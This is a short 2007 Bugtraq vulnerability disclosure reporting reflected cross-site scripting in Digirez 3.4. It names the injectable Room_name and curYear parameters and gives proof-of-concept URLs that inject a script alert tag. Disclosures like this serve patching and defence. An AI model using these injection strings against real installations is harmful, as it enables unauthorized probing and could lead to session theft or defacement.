Bugtraq mailing list archives

Multiple XSS in Digirez


From: xx_hack_xx_2004 () hotmail com
Date: 25 May 2007 10:03:24 -0000

Hello 
Vulnerable : Digirez 
Version: 3.4
web : http://www.digiappz.com


XSS :
1-
http://www.example.com/room/info_book.asp?Room_name=[XSS]
2-
http://www.example.com/room/week.asp?curYear=[XSS]

For Example u can put :
1-
http://www.example.com/room/info_book.asp?Room_name=&apos;><script>alert(1);</script>
2-
http://www.example.com/room/week.asp?curYear=&apos;><script>alert(1);</script>

Discovered  By Linux_Drox
www.LeZr.Com

Best regards ,,


Current thread: